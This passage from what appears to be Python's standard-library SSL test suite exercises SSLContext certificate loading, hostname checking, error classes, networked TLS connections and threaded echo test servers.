self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
self.assertEqual(
ctx.options & getattr(ssl, "OP_SINGLE_DH_USE", 0),
getattr(ssl, "OP_SINGLE_DH_USE", 0),
)
self.assertEqual(
ctx.options & getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertFalse(ctx.check_hostname)
# Requires CERT_REQUIRED or CERT_OPTIONAL
with self.assertRaises(ValueError):
ctx.check_hostname = True
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
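# A minimal sketch (not part of the suite) of the ordering rule exercised
# above: verify_mode must be CERT_REQUIRED or CERT_OPTIONAL before
# check_hostname can be enabled, and it cannot return to CERT_NONE while
# check_hostname is still on.
#
#     ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
#     ctx.verify_mode = ssl.CERT_REQUIRED   # must come first
#     ctx.check_hostname = True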
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of an SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with socket.socket() as s:
s.bind(("127.0.0.1", 0))
s.listen(5)
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
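# The networked and threaded tests below reuse one retry idiom for
# non-blocking handshakes; a minimal sketch (assuming `sock` is a
# non-blocking SSLSocket):
#
#     while True:
#         try:
#             sock.do_handshake()
#             break
#         except ssl.SSLWantReadError:
#             select.select([sock], [], [])
#         except ssl.SSLWantWriteError:
#             select.select([], [sock], [])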
class NetworkedTests(unittest.TestCase):
def test_connect(self):
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE)
try:
s.connect((REMOTE_HOST, 443))
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# this should fail because we have no verification certs
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, (REMOTE_HOST, 443))
s.close()
# this should succeed because we specify the root cert
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
s.connect((REMOTE_HOST, 443))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
self.assertEqual(0, s.connect_ex((REMOTE_HOST, 443)))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.setblocking(False)
rc = s.connect_ex((REMOTE_HOST, 443))
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
finally:
s.close()
def test_connect_ex_error(self):
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
rc = s.connect_ex((REMOTE_HOST, 444))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
finally:
s.close()
def test_connect_with_context(self):
with support.transient_internet(REMOTE_HOST):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# Same with a server hostname
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=REMOTE_HOST)
s.connect((REMOTE_HOST, 443))
s.close()
# This should fail because we have no verification certs
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, (REMOTE_HOST, 443))
s.close()
# This should succeed because we specify the root cert
ctx.load_verify_locations(REMOTE_ROOT_CERT)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_cadata(self):
with open(REMOTE_ROOT_CERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect((REMOTE_HOST, 443))
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect((REMOTE_HOST, 443))
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
with support.transient_internet(REMOTE_HOST):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
ss.connect((REMOTE_HOST, 443))
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
with support.transient_internet(REMOTE_HOST):
s = socket.socket(socket.AF_INET)
s.connect((REMOTE_HOST, 443))
s.setblocking(False)
s = ssl.wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
s.close()
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
def _test_get_server_certificate(host, port, cert=None):
with support.transient_internet(host):
pem = ssl.get_server_certificate((host, port),
ssl.PROTOCOL_SSLv23)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
try:
pem = ssl.get_server_certificate((host, port),
ssl.PROTOCOL_SSLv23,
ca_certs=CERTFILE)
except ssl.SSLError as x:
# should fail: CERTFILE is not the remote server's root cert
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
self.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
pem = ssl.get_server_certificate((host, port),
ssl.PROTOCOL_SSLv23,
ca_certs=cert)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
_test_get_server_certificate(REMOTE_HOST, 443, REMOTE_ROOT_CERT)
if support.IPV6_ENABLED:
_test_get_server_certificate('ipv6.google.com', 443)
def test_ciphers(self):
remote = (REMOTE_HOST, 443)
with support.transient_internet(remote[0]):
with ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(remote)
with ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(remote)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = ssl.wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(remote)
def test_algorithms(self):
# Issue #8484: all algorithms should be available when verifying a
# certificate.
# SHA256 was added in OpenSSL 0.9.8
if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
# sha256.tbs-internet.com needs SNI to use the correct certificate
if not ssl.HAS_SNI:
self.skipTest("SNI needed for this test")
# https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host)
remote = ("sha256.tbs-internet.com", 443)
sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
with support.transient_internet("sha256.tbs-internet.com"):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(sha256_cert)
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="sha256.tbs-internet.com")
try:
s.connect(remote)
if support.verbose:
sys.stdout.write("\nCipher with %r is %r\n" %
(remote, s.cipher()))
sys.stdout.write("Certificate is:\n%s\n" %
pprint.pformat(s.getpeercert()))
finally:
s.close()
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
with support.transient_internet(REMOTE_HOST):
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s) as ss:
ss.connect((REMOTE_HOST, 443))
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
try:
import threading
except ImportError:
_have_threads = False
else:
_have_threads = True
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_protocols.append(self.sslconn.selected_npn_protocol())
except (ssl.SSLError, ConnectionResetError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
self.server.conn_errors.append(e)
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLSv1)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_protocols = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen(5)
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer(asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = ssl.wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
